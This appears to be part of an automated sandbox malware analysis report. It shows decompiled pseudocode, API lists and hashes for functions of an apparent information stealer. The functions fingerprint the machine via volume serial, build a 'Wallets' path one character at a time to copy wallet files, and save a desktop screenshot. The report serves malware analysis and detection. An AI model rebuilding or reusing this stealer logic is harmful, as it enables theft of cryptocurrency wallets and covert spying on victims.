								_t253 = _t253 + 0xc;
							}
							_v292 = _t245[4];
							_v288 = _t245[5];
							_t245[4] = _t194;
							_t245[5] = _t194;
						}
						if(_v316 >= 0x10) {
							_push(_v336);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_v316 = 0xf;
						_v320 = _t194;
						_v336 = 0;
						if(_v344 >= 0x10) {
							_push(_v364);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_v344 = 0xf;
						_v348 = _t194;
						_v364 = 0;
						if(_v372 >= 0x10) {
							_push(_v392);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_v372 = 0xf;
						_v376 = _t194;
						_v392 = 0;
						if(_v400 >= 0x10) {
							_push(_v420);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_v400 = 0xf;
						_v404 = _t194;
						_v420 = 0;
						if(_v428 >= 0x10) {
							_push(_v448);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_v428 = 0xf;
						_v432 = _t194;
						_v448 = 0;
						if(_v456 >= 0x10) {
							_push(_v476);
							E0042A289();
							_t253 = _t253 + 4;
						}
						_t228 =  &_v308;
						 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
						 *(_t238 + 0x10) = _t194;
						 *_t238 = 0;
						if(_t238 ==  &_v308) {
							goto L17;
						} else {
							if( *((intOrPtr*)(_t238 + 0x14)) >= 0x10) {
								_push( *_t238);
								E0042A289();
								_t253 = _t253 + 4;
							}
							 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
							 *(_t238 + 0x10) = _t194;
							 *_t238 = 0;
							if(_v288 >= 0x10) {
								_t228 = _v288;
								 *_t238 = _v308;
								 *(_t238 + 0x10) = _v292;
								 *((intOrPtr*)(_t238 + 0x14)) = _v288;
							} else {
								E0042C040(_t238,  &_v308, _v292 + 1);
								_t228 = _v288;
								 *(_t238 + 0x10) = _v292;
								 *((intOrPtr*)(_t238 + 0x14)) = _v288;
							}
							goto L19;
						}
					} else {
						_t197 = _v492 - _t243;
						do {
							_t243[_t197] = E0042E013( *_t243 & 0x000000ff);
							_t243 =  &(_t243[1]);
							_t252 = _t252 + 4;
						} while (_t243 != _v488);
						_t194 = 0;
						goto L35;
					}
				} else {
					 *((intOrPtr*)(_t238 + 0x14)) = 0xf;
					 *(_t238 + 0x10) = _t194;
					 *_t238 = 0;
					_t247 = E0042BC70(_t194);
					_t253 = _t251 + 4;
					if(_t247 > 0xfffffffe) {
						E00429799("string too long");
					}
					_t185 =  *((intOrPtr*)(_t238 + 0x14));
					if(_t185 >= _t247) {
						if(_t247 != _t194) {
							L9:
							if(_t261 > 0) {
								if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
									_t186 = _t238;
								} else {
									_t186 =  *_t238;
								}
								E0042B8D0(_t186, _t194, _t247);
								_t253 = _t253 + 0xc;
								 *(_t238 + 0x10) = _t247;
								if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
									 *((char*)(_t238 + _t247)) = 0;
								} else {
									 *((char*)( *_t238 + _t247)) = 0;
								}
							}
							L17:
							if(_v288 >= 0x10) {
								_push(_v308);
								E0042A289();
							}
							L19:
							 *[fs:0x0] = _v16;
							_pop(_t239);
							_pop(_t246);
							_pop(_t195);
							return E0042A36A(_t238, _t195, _v20 ^ _t248, _t228, _t239, _t246);
						}
						 *(_t238 + 0x10) = _t194;
						if(_t185 < 0x10) {
							_t190 = _t238;
						} else {
							_t190 =  *_t238;
						}
						 *_t190 = 0;
						goto L17;
					}
					_t228 =  *(_t238 + 0x10);
					E004044F0(_t238, _t247,  *(_t238 + 0x10));
					_t261 = _t247 - _t194;
					goto L9;
				}
			}

0x0041f8e3
0x0041f8e5
0x0041f8f0
0x0041f8f1
0x0041f8f7
0x0041f8fc
0x0041f8fe
0x0041f904
0x0041f908
0x0041f90e
0x0041f911
0x0041f913
0x0041f919
0x0041f91f
0x0041f925
0x0041f92f
0x0041f935
0x0041f947
0x0041f952
0x0041f954
0x0041f954
0x0041f975
0x0041f97b
0x0041f984
0x0041f98b
0x0041f998
0x0041f99d
0x0041f9a4
0x0041f9af
0x0041f9bd
0x0041f9c2
0x0041f9c5
0x0041f9d0
0x0041f9dc
0x0041f9e3
0x0041f9e4
0x0041f9e7
0x0041f9ff
0x0041fa03
0x0041fae0
0x0041fae7
0x0041faec
0x0041faf7
0x0041fafc
0x0041fb02
0x0041fb0b
0x0041fb1b
0x0041fb0d
0x0041fb0d
0x0041fb0d
0x0041fb21
0x0041fb26
0x0041fb28
0x0041fb28
0x0041fb2e
0x0041fb34
0x0041fb3d
0x0041fb3f
0x0041fb3f
0x0041fb47
0x0041fb6b
0x0041fb78
0x0041fb8a
0x0041fb8e
0x0041fba2
0x0041fba6
0x0041fbb7
0x0041fbbb
0x0041fbcf
0x0041fbd3
0x0041fbe1
0x0041fbe5
0x0041fbea
0x0041fbed
0x0041fbf7
0x0041fc00
0x0041fc08
0x0041fc09
0x0041fc0e
0x0041fc0e
0x0041fc11
0x0041fc1b
0x0041fc21
0x0041fc2c
0x0041fc47
0x0041fc4d
0x0041fc2e
0x0041fc3b
0x0041fc40
0x0041fc40
0x0041fc52
0x0041fc5b
0x0041fc61
0x0041fc64
0x0041fc64
0x0041fc6e
0x0041fc76
0x0041fc77
0x0041fc7c
0x0041fc7c
0x0041fc86
0x0041fc90
0x0041fc96
0x0041fc9d
0x0041fca5
0x0041fca6
0x0041fcab
0x0041fcab
0x0041fcb5
0x0041fcbf
0x0041fcc5
0x0041fccc
0x0041fcd4
0x0041fcd5
0x0041fcda
0x0041fcda
0x0041fce4
0x0041fcee
0x0041fcf4
0x0041fcfb
0x0041fd03
0x0041fd04
0x0041fd09
0x0041fd09
0x0041fd13
0x0041fd1d
0x0041fd23
0x0041fd2a
0x0041fd32
0x0041fd33
0x0041fd38
0x0041fd38
0x0041fd42
0x0041fd4c
0x0041fd52
0x0041fd59
0x0041fd61
0x0041fd62
0x0041fd67
0x0041fd67
0x0041fd6a
0x0041fd70
0x0041fd77
0x0041fd7a
0x0041fd7f
0x00000000
0x0041fd85
0x0041fd89
0x0041fd8d
0x0041fd8e
0x0041fd93
0x0041fd93
0x0041fd96
0x0041fd9d
0x0041fda0
0x0041fdaa
0x0041fde7
0x0041fded
0x0041fdef
0x0041fdf2
0x0041fdac
0x0041fdbc
0x0041fdc7
0x0041fdd0
0x0041fdd3
0x0041fdd3
0x00000000
0x0041fdaa
0x0041fb49
0x0041fb4f
0x0041fb51
0x0041fb5a
0x0041fb5d
0x0041fb5e
0x0041fb61
0x0041fb69
0x00000000
0x0041fb69
0x0041fa09
0x0041fa09
0x0041fa10
0x0041fa14
0x0041fa1c
0x0041fa1e
0x0041fa24
0x0041fa2b
0x0041fa2b
0x0041fa30
0x0041fa35
0x0041fa53
0x0041fa45
0x0041fa45
0x0041fa4b
0x0041fa9e
0x0041fa4d
0x0041fa4d
0x0041fa4d
0x0041faa3
0x0041faa8
0x0041faaf
0x0041fab2
0x0041fabe
0x0041fab4
0x0041fab6
0x0041fab6
0x0041fab2
0x0041fa66
0x0041fa6d
0x0041fa75
0x0041fa76
0x0041fa7b
0x0041fa7e
0x0041fa83
0x0041fa8b
0x0041fa8c
0x0041fa8d
0x0041fa9b
0x0041fa9b
0x0041fa55
0x0041fa5b
0x0041fa61
0x0041fa5d
0x0041fa5d
0x0041fa5d
0x0041fa63
0x00000000
0x0041fa63
0x0041fa37
0x0041fa3e
0x0041fa43
0x00000000
0x0041fa43

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,C21D6F0A,?,00000010,?), ref: 0041F94A
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000010,?), ref: 0041F98B
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000010,?), ref: 0041F9F2
HeapAlloc.KERNEL32(00000000,?,?,00000010,?), ref: 0041F9F9
_strlen.LIBCMT ref: 0041FA17
std::_Xinvalid_argument.LIBCPMT ref: 0041FA2B

Strings

:\, xrefs: 0041F97B
string too long, xrefs: 0041FA26
%08lX%04lX%lu-, xrefs: 0041FADA
C, xrefs: 0041F954

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowsXinvalid_argument_strlenstd::_
String ID: %08lX%04lX%lu-$:\$C$string too long
API String ID: 3100092113-3491094078
Opcode ID: 7cd058ac0574c358346f279926d0d57ef95c0369fe95b22af9d6576f554e8769
Instruction ID: 7961a7feba8c91d6608641df3a75011e3902acfd22d7afa6721ab8f89ddfd78b
Opcode Fuzzy Hash: 7cd058ac0574c358346f279926d0d57ef95c0369fe95b22af9d6576f554e8769
Instruction Fuzzy Hash: CEE17BB19002689BDB25DF59DC80BDAB7B4BF09304F0045EEE40A67242D7786BC5CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 23.0, APIs: 15, Instructions: 531
stringCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00412570(intOrPtr __ecx, intOrPtr _a4, char _a8, char _a24, intOrPtr _a28, char _a36, char _a52, intOrPtr _a56, char _a64, intOrPtr _a84) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				intOrPtr _v288;
				char _v292;
				char _v308;
				intOrPtr _v316;
				char _v320;
				char _v336;
				char _v344;
				char _v348;
				char _v364;
				char _v372;
				char _v376;
				char _v392;
				intOrPtr _v400;
				char _v420;
				char _v428;
				char _v432;
				char _v448;
				char _v456;
				char _v460;
				char _v476;
				char _v484;
				char _v488;
				char _v504;
				char _v512;
				char _v516;
				char _v532;
				char _v540;
				char _v544;
				char _v560;
				intOrPtr _v568;
				char _v572;
				short _v588;
				char _v589;
				short* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				char _v612;
				char _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t227;
				signed int _t228;
				void* _t234;
				char _t238;
				void* _t251;
				void* _t253;
				intOrPtr* _t255;
				void* _t258;
				void* _t260;
				void* _t261;
				intOrPtr* _t263;
				intOrPtr _t264;
				char* _t279;
				intOrPtr* _t283;
				void* _t285;
				void* _t287;
				intOrPtr* _t289;
				void* _t291;
				void* _t293;
				intOrPtr* _t295;
				intOrPtr _t299;
				void* _t314;
				void* _t332;
				void* _t398;
				char _t399;
				void* _t400;
				intOrPtr _t401;
				void* _t402;
				short* _t404;
				void* _t405;
				intOrPtr* _t407;
				signed int _t415;
				void* _t416;
				void* _t417;
				intOrPtr _t419;
				void* _t420;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;

				_push(0xffffffff);
				_push(E0043E9E9);
				_push( *[fs:0x0]);
				_t417 = _t416 - 0x260;
				_t227 =  *0x451f00; // 0xc21d6f0a
				_t228 = _t227 ^ _t415;
				_v20 = _t228;
				_push(_t402);
				_push(_t398);
				_push(_t228);
				 *[fs:0x0] =  &_v16;
				_v600 = __ecx;
				_v8 = 0;
				_v344 = 0xf;
				_v348 = 0;
				_v364 = 0;
				_v8 = 3;
				_t427 = _a4;
				if(_a4 == 0) {
					_push(0x1a);
				} else {
					_push(0x1c);
				}
				E00404BC0( &_v364, _t230, E0042BC70(E00420650(0, _t398, _t402)));
				_t234 = E00412420( &_v560,  &_v364,  &_a8);
				_t419 = _t417 + 8 - 0x10;
				_v604 = _t419;
				_t377 =  &_a64;
				_v8 = 4;
				E004124E0(_t419, _t419, _t234,  &_a64);
				_t420 = _t419 + 0xc;
				_push( &_v620);
				E00424100( &_v589, _t427); // executed
				_t399 = 0x10;
				_v8 = 6;
				if(_v540 >= 0x10) {
					_push(_v560);
					E0042A289();
					_t420 = _t420 + 4;
				}
				_t238 = _v616;
				_t404 = _v620;
				_v540 = 0xf;
				_v544 = 0;
				_v560 = 0;
				_v604 = _t238;
				_v596 = _t404;
				if(_t404 != _t238) {
					do {
						_v428 = 7;
						_v432 = 0;
						_v448 = 0;
						E004122B0( &_v448, _v596, 0, 0xffffffff);
						_v8 = 7;
						_t251 = E004238C0( &_v589,  &_v476,  &_v448);
						_v8 = 8;
						_t253 = E00412420( &_v532,  &_v364,  &_a8);
						_v8 = 9;
						_t255 = E00404E00( &_v364,  &_v504, _t253, _t251);
						_t422 = _t420 + 0x18;
						_t407 = _t255;
						_v372 = 0xf;
						_v376 = 0;
						_v392 = 0;
						if( &_v392 != _t407) {
							_v372 = 0xf;
							_v376 = 0;
							_v392 = 0;
							if( *((intOrPtr*)(_t407 + 0x14)) >= _t399) {
								_v392 =  *_t407;
								 *_t407 = 0;
							} else {
								E0042C040( &_v392, _t407,  *((intOrPtr*)(_t407 + 0x10)) + 1);
								_t422 = _t422 + 0xc;
							}
							_v376 =  *((intOrPtr*)(_t407 + 0x10));
							_v372 =  *((intOrPtr*)(_t407 + 0x14));
							 *((intOrPtr*)(_t407 + 0x10)) = 0;
							 *((intOrPtr*)(_t407 + 0x14)) = 0;
						}
						if(_v484 >= _t399) {
							_push(_v504);
							E0042A289();
							_t422 = _t422 + 4;
						}
						_v484 = 0xf;
						_v488 = 0;
						_v504 = 0;
						if(_v512 >= _t399) {
							_push(_v532);
							E0042A289();
							_t422 = _t422 + 4;
						}
						_v512 = 0xf;
						_v516 = 0;
						_v532 = 0;
						_v8 = 0xe;
						if(_v456 >= _t399) {
							_push(_v476);
							E0042A289();
							_t422 = _t422 + 4;
						}
						_v456 = 0xf;
						_v460 = 0;
						_v476 = 0;
						_t258 = E004238C0( &_v589,  &_v420,  &_v448);
						_v8 = 0xf;
						_t260 = E00412420( &_v308,  &_v364,  &_a8);
						_v8 = 0x10;
						_t261 = E00404E00( &_v308,  &_v336, _t260, _t258);
						_t423 = _t422 + 0x18;
						_v8 = 0x11;
						_t263 = E00423960( &_v589,  &_v588, _t261);
						_v8 = 0x12;
						if( *((intOrPtr*)(_t263 + 0x14)) >= 8) {
							_t263 =  *_t263;
						}
						_t264 = E00420590(_t263); // executed
						_v624 = _t264;
						if(_v568 >= 8) {
							_push(_v588);
							E0042A289();
							_t423 = _t423 + 4;
						}
						_v568 = 7;
						_v572 = 0;
						_v588 = 0;
						if(_v316 >= _t399) {
							_push(_v336);
							E0042A289();
							_t423 = _t423 + 4;
						}
						_v316 = 0xf;
						_v320 = 0;
						_v336 = 0;
						if(_v288 >= _t399) {
							_push(_v308);
							E0042A289();
							_t423 = _t423 + 4;
						}
						_v288 = 0xf;
						_v292 = 0;
						_v308 = 0;
						_v8 = 0xe;
						if(_v400 >= _t399) {
							_push(_v420);
							E0042A289();
							_t423 = _t423 + 4;
						}
						if(_v624 != 0) {
							_t312 = _v600;
							 *((intOrPtr*)(_v600 + 0x1c)) =  *((intOrPtr*)(_v600 + 0x1c)) + 1;
							_t314 = E00409F40( *((intOrPtr*)(_t312 + 0x1c)));
							_t423 = _t423 + 4;
							E0040A210(_t314);
						}
						E0042A2F0( &_v280, 0, 0x104);
						_t424 = _t423 + 0xc;
						 *0x464860( &_v280, "\\");
						 *0x464860( &_v280, "W");
						 *0x464860( &_v280, "a");
						 *0x464860( &_v280, "l");
						 *0x464860( &_v280, "l");
						 *0x464860( &_v280, "e");
						 *0x464860( &_v280, "t");
						 *0x464860( &_v280, "s");
						 *0x464860( &_v280, "\\");
						_t279 = _a36;
						if(_a56 < _t399) {
							_t279 =  &_a36;
						}
						 *0x464860( &_v280, _t279);
						 *0x464860( &_v280, "\\");
						_t283 = E004238C0( &_v589,  &_v420,  &_v448);
						_v8 = 0x13;
						if( *((intOrPtr*)(_t283 + 0x14)) >= _t399) {
							_t283 =  *_t283;
						}
						 *0x464860( &_v280, _t283);
						_v8 = 0xe;
						if(_v400 >= _t399) {
							_push(_v420);
							E0042A289();
							_t424 = _t424 + 4;
						}
						_t285 = E004238C0( &_v589,  &_v420,  &_v448);
						_v8 = 0x14;
						_t287 = E00412420( &_v336,  &_v364,  &_a8);
						_v8 = 0x15;
						_t289 = E00404E00( &_v364,  &_v308, _t287, _t285);
						_t425 = _t424 + 0x18;
						_v8 = 0x16;
						if( *((intOrPtr*)(_t289 + 0x14)) >= _t399) {
							_t289 =  *_t289;
						}
						E004205F0(_t289); // executed
						if(_v288 >= _t399) {
							_push(_v308);
							E0042A289();
							_t425 = _t425 + 4;
						}
						_v288 = 0xf;
						_v292 = 0;
						_v308 = 0;
						if(_v316 >= _t399) {
							_push(_v336);
							E0042A289();
							_t425 = _t425 + 4;
						}
						_v316 = 0xf;
						_v320 = 0;
						_v336 = 0;
						_v8 = 0xe;
						if(_v400 >= _t399) {
							_push(_v420);
							E0042A289();
							_t425 = _t425 + 4;
						}
						_t291 = E004238C0( &_v589,  &_v420,  &_v448);
						_v8 = 0x17;
						_t293 = E00412420( &_v336,  &_v364,  &_a8);
						_v8 = 0x18;
						_t295 = E00404E00( &_v364,  &_v308, _t293, _t291);
						_t426 = _t425 + 0x18;
						_v8 = 0x19;
						if( *((intOrPtr*)(_t295 + 0x14)) >= _t399) {
							_t295 =  *_t295;
						}
						_t377 = _v600;
						E004295D0( *((intOrPtr*)(_v600 + 0x20)),  &_v280, _t295); // executed
						_t420 = _t426 + 0xc;
						if(_v288 >= _t399) {
							_push(_v308);
							E0042A289();
							_t420 = _t420 + 4;
						}
						_v288 = 0xf;
						_v292 = 0;
						_v308 = 0;
						if(_v316 >= _t399) {
							_t377 = _v336;
							_push(_v336);
							E0042A289();
							_t420 = _t420 + 4;
						}
						_v316 = 0xf;
						_v320 = 0;
						_v336 = 0;
						if(_v400 >= _t399) {
							_push(_v420);
							E0042A289();
							_t420 = _t420 + 4;
						}
						if(_v372 >= _t399) {
							_push(_v392);
							E0042A289();
							_t420 = _t420 + 4;
						}
						_v8 = 6;
						if(_v428 >= 8) {
							_t377 = _v448;
							_push(_v448);
							E0042A289();
							_t420 = _t420 + 4;
						}
						_t299 = _v596 + 0x1c;
						_v596 = _t299;
					} while (_t299 != _v604);
					_t238 = _v616;
					_t404 = _v620;
				}
				if(_t404 != 0) {
					_t401 = _t238;
					if(_t404 != _t238) {
						do {
							if( *((intOrPtr*)(_t404 + 0x14)) >= 8) {
								_push( *_t404);
								E0042A289();
								_t420 = _t420 + 4;
							}
							 *((intOrPtr*)(_t404 + 0x14)) = 7;
							 *((intOrPtr*)(_t404 + 0x10)) = 0;
							 *_t404 = 0;
							_t404 = _t404 + 0x1c;
						} while (_t404 != _t401);
						_t404 = _v620;
					}
					_push(_t404);
					E0042A289();
					_t420 = _t420 + 4;
					_t399 = 0x10;
				}
				_v620 = 0;
				_v616 = 0;
				_v612 = 0;
				if(_v344 >= _t399) {
					_t377 = _v364;
					_push(_v364);
					E0042A289();
					_t420 = _t420 + 4;
				}
				_v344 = 0xf;
				_v348 = 0;
				_v364 = 0;
				if(_a28 >= _t399) {
					_push(_a8);
					E0042A289();
					_t420 = _t420 + 4;
				}
				_a28 = 0xf;
				_a24 = 0;
				_a8 = 0;
				if(_a56 >= _t399) {
					_push(_a36);
					E0042A289();
					_t420 = _t420 + 4;
				}
				_a56 = 0xf;
				_a52 = 0;
				_a36 = 0;
				if(_a84 >= _t399) {
					_t377 = _a64;
					_push(_a64);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t400);
				_pop(_t405);
				_pop(_t332);
				return E0042A36A(0, _t332, _v20 ^ _t415, _t377, _t400, _t405);
			}

0x00412573
0x00412575
0x00412580
0x00412581
0x00412587
0x0041258c
0x0041258e
0x00412592
0x00412593
0x00412594
0x00412598
0x0041259e
0x004125a6
0x004125a9
0x004125b3
0x004125b9
0x004125bf
0x004125c3
0x004125c6
0x004125cc
0x004125c8
0x004125c8
0x004125c8
0x004125e6
0x004125fd
0x00412602
0x00412607
0x0041260d
0x00412613
0x00412617
0x0041261c
0x00412625
0x0041262c
0x00412631
0x00412636
0x00412640
0x00412648
0x00412649
0x0041264e
0x0041264e
0x00412651
0x00412657
0x0041265d
0x00412667
0x0041266d
0x00412673
0x00412679
0x00412681
0x00412687
0x00412699
0x004126a3
0x004126a9
0x004126b0
0x004126c9
0x004126cd
0x004126e6
0x004126ea
0x004126f8
0x004126fc
0x00412701
0x00412704
0x00412711
0x00412717
0x0041271d
0x00412725
0x00412727
0x0041272d
0x00412733
0x0041273c
0x00412753
0x00412759
0x0041273e
0x00412747
0x0041274c
0x0041274c
0x0041275e
0x00412767
0x0041276d
0x00412770
0x00412770
0x00412779
0x00412781
0x00412782
0x00412787
0x00412787
0x0041278a
0x00412794
0x0041279a
0x004127a6
0x004127ae
0x004127af
0x004127b4
0x004127b4
0x004127b7
0x004127c1
0x004127c7
0x004127cd
0x004127d7
0x004127df
0x004127e0
0x004127e5
0x004127e5
0x004127fc
0x00412806
0x0041280c
0x00412812
0x0041282b
0x0041282f
0x0041283d
0x00412841
0x00412846
0x00412857
0x0041285b
0x00412865
0x0041286c
0x0041286e
0x0041286e
0x00412877
0x0041287c
0x00412888
0x00412890
0x00412891
0x00412896
0x00412896
0x0041289b
0x004128a5
0x004128ab
0x004128b8
0x004128c0
0x004128c1
0x004128c6
0x004128c6
0x004128ce
0x004128d4
0x004128da
0x004128e6
0x004128ee
0x004128ef
0x004128f4
0x004128f4
0x004128f7
0x004128fd
0x00412903
0x00412909
0x00412913
0x0041291b
0x0041291c
0x00412921
0x00412921
0x0041292a
0x0041292c
0x00412932
0x00412939
0x0041293e
0x00412941
0x00412941
0x00412953
0x00412958
0x00412967
0x00412979
0x0041298b
0x0041299d
0x004129af
0x004129c1
0x004129d3
0x004129e5
0x004129f7
0x004129fd
0x00412a03
0x00412a05
0x00412a05
0x00412a10
0x00412a22
0x00412a3c
0x00412a41
0x00412a48
0x00412a4a
0x00412a4a
0x00412a54
0x00412a5a
0x00412a64
0x00412a6c
0x00412a6d
0x00412a72
0x00412a72
0x00412a89
0x00412aa2
0x00412aa6
0x00412ab4
0x00412ab8
0x00412abd
0x00412ac0
0x00412ac7
0x00412ac9
0x00412ac9
0x00412ad2
0x00412add
0x00412ae5
0x00412ae6
0x00412aeb
0x00412aeb
0x00412af3
0x00412af9
0x00412aff
0x00412b0b
0x00412b13
0x00412b14
0x00412b19
0x00412b19
0x00412b1c
0x00412b22
0x00412b28
0x00412b2e
0x00412b38
0x00412b40
0x00412b41
0x00412b46
0x00412b46
0x00412b5d
0x00412b76
0x00412b7a
0x00412b88
0x00412b8c
0x00412b91
0x00412b94
0x00412b9b
0x00412b9d
0x00412b9d
0x00412b9f
0x00412bb1
0x00412bb6
0x00412bbf
0x00412bc7
0x00412bc8
0x00412bcd
0x00412bcd
0x00412bd5
0x00412bdb
0x00412be1
0x00412bed
0x00412bef
0x00412bf5
0x00412bf6
0x00412bfb
0x00412bfb
0x00412bfe
0x00412c04
0x00412c0a
0x00412c16
0x00412c1e
0x00412c1f
0x00412c24
0x00412c24
0x00412c2d
0x00412c35
0x00412c36
0x00412c3b
0x00412c3b
0x00412c45
0x00412c49
0x00412c4b
0x00412c51
0x00412c52
0x00412c57
0x00412c57
0x00412c60
0x00412c63
0x00412c69
0x00412c75
0x00412c7b
0x00412c7b
0x00412c83
0x00412c85
0x00412c89
0x00412c90
0x00412c94
0x00412c98
0x00412c99
0x00412c9e
0x00412c9e
0x00412ca3
0x00412caa
0x00412cad
0x00412cb0
0x00412cb3
0x00412cb7
0x00412cb7
0x00412cbd
0x00412cbe
0x00412cc3
0x00412cc6
0x00412cc6
0x00412ccb
0x00412cd1
0x00412cd7
0x00412ce3
0x00412ce5
0x00412ceb
0x00412cec
0x00412cf1
0x00412cf1
0x00412cf4
0x00412cfe
0x00412d04
0x00412d0d
0x00412d12
0x00412d13
0x00412d18
0x00412d18
0x00412d1b
0x00412d22
0x00412d25
0x00412d2b
0x00412d30
0x00412d31
0x00412d36
0x00412d36
0x00412d39
0x00412d40
0x00412d43
0x00412d49
0x00412d4b
0x00412d4e
0x00412d4f
0x00412d54
0x00412d5c
0x00412d64
0x00412d65
0x00412d66
0x00412d74

APIs

_strlen.LIBCMT ref: 004125D6
_memmove.LIBCMT ref: 00412747
_memset.LIBCMT ref: 00412953
lstrcat.KERNEL32(?,00443C68), ref: 00412967
lstrcat.KERNEL32(?,00445C08), ref: 00412979
lstrcat.KERNEL32(?,00445A68), ref: 0041298B
lstrcat.KERNEL32(?,00445A6C), ref: 0041299D
lstrcat.KERNEL32(?,00445A6C), ref: 004129AF
lstrcat.KERNEL32(?,00445A78), ref: 004129C1
lstrcat.KERNEL32(?,00445A84), ref: 004129D3
lstrcat.KERNEL32(?,00445A44), ref: 004129E5
lstrcat.KERNEL32(?,00443C68), ref: 004129F7
lstrcat.KERNEL32(?,?), ref: 00412A10
lstrcat.KERNEL32(?,00443C68), ref: 00412A22
lstrcat.KERNEL32(?,00000000), ref: 00412A54

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memmove_memset_strlen
String ID:
API String ID: 2512504329-0
Opcode ID: 4e4ae62306d7e54faa2171269cabf75f4f15aab7b5a548bddc061734284a6657
Instruction ID: 3578fd1904fd7e1bf42fcb864d42b62ae9c3fb22e0c50fa71e85a02b4a9a9207
Opcode Fuzzy Hash: 4e4ae62306d7e54faa2171269cabf75f4f15aab7b5a548bddc061734284a6657
Instruction Fuzzy Hash: B9329DB1D00268DBCB21DF55DD85ADEB7B4AF49304F0445EEE409A3201EB799B84CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00420760 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00420760(intOrPtr _a8) {
				signed int _v8;
				char _v24;
				struct tagRECT _v40;
				char _v44;
				char _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				char _v64;
				void* _v68;
				void* _v72;
				struct HWND__* _v76;
				struct HWND__* _v80;
				struct HWND__* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				void* _t43;
				void* _t46;
				void* _t52;
				void* _t53;
				void* _t56;
				void* _t60;
				void* _t62;
				void* _t74;
				void* _t75;
				struct HWND__* _t93;
				signed int _t94;

				_t38 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t38 ^ _t94;
				_t93 = 0;
				_t92 = 1;
				_v60 = _a8;
				_v88 = 1;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0042A2F0( &_v88, 0, 0x10);
				_t87 =  &_v88;
				_v88 = 1;
				_t43 =  *0x46486c( &_v64,  &_v88, 0); // executed
				if(_t43 == 0) {
					_t46 =  *0x4647cc(0, 1,  &_v48); // executed
					if(_t46 == 0) {
						_t93 = GetDesktopWindow();
						GetWindowRect(_t93,  &_v40);
						_t75 =  *0x4648e0(_t93, _t74);
						_t92 =  *0x464790(_t75);
						_t52 =  *0x4646fc(_t75, _v40.right, _v40.bottom);
						_v52 = _t52;
						_t53 = SelectObject(_t92, _t52);
						_v68 = _t53;
						 *0x4646bc(_t92, 0, 0, _v40.right, _v40.bottom, _t75, 0, 0, 0xcc0020);
						_t87 = _v52;
						_t56 =  *0x46482c(_v52, 0,  &_v44); // executed
						if(_t56 == 0 && E004206B0(L"image/jpeg",  &_v24) != 0xffffffff) {
							_t87 = _v48;
							_t60 =  *0x464800(_v44, _v48,  &_v24, 0); // executed
							if(_t60 == 0) {
								 *0x4646c8(_v48,  &_v56);
								_t62 = _v56;
								GlobalFix(_t62);
								_v72 = _t62;
								E00429620(_v60, "\\screenshot.jpg", _v72, GlobalSize(_v56));
								SelectObject(_t92, _v68);
								_t87 = _v44;
								 *0x464740(_v44); // executed
								 *0x46484c(_v64);
								DeleteObject(_v52);
								DeleteObject(_t92);
								 *0x464864(_t93, _t75);
								CloseWindow(_t93); // executed
							}
						}
						_pop(_t74);
					}
				}
				return E0042A36A(0, _t74, _v8 ^ _t94, _t87, _t92, _t93);
			}

0x00420766
0x0042076d
0x00420775
0x0042077d
0x00420783
0x00420786
0x00420789
0x0042078c
0x0042078f
0x00420792
0x0042079b
0x004207a3
0x004207a6
0x004207ae
0x004207ba
0x004207c2
0x004207d2
0x004207d6
0x004207e3
0x004207ef
0x004207f7
0x004207ff
0x00420802
0x00420816
0x00420822
0x00420828
0x00420832
0x0042083a
0x0042085a
0x00420868
0x00420870
0x0042087a
0x00420880
0x00420884
0x0042088e
0x004208a5
0x004208b2
0x004208b8
0x004208bc
0x004208c6
0x004208d0
0x004208d7
0x004208df
0x004208e6
0x004208e6
0x00420870
0x004208ec
0x004208ec
0x004207c2
0x004208fe

APIs

_memset.LIBCMT ref: 00420792
GetDesktopWindow.USER32 ref: 004207C9
GetWindowRect.USER32(00000000,?), ref: 004207D6
SelectObject.GDI32(00000000,00000000), ref: 00420802
GlobalFix.KERNEL32(?), ref: 00420884
GlobalSize.KERNEL32(?), ref: 00420891
SelectObject.GDI32(00000000,?), ref: 004208B2
DeleteObject.GDI32(?), ref: 004208D0
DeleteObject.GDI32(00000000), ref: 004208D7
CloseWindow.USER32(00000000), ref: 004208E6

Strings

image/jpeg, xrefs: 00420844
\screenshot.jpg, xrefs: 0042089F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

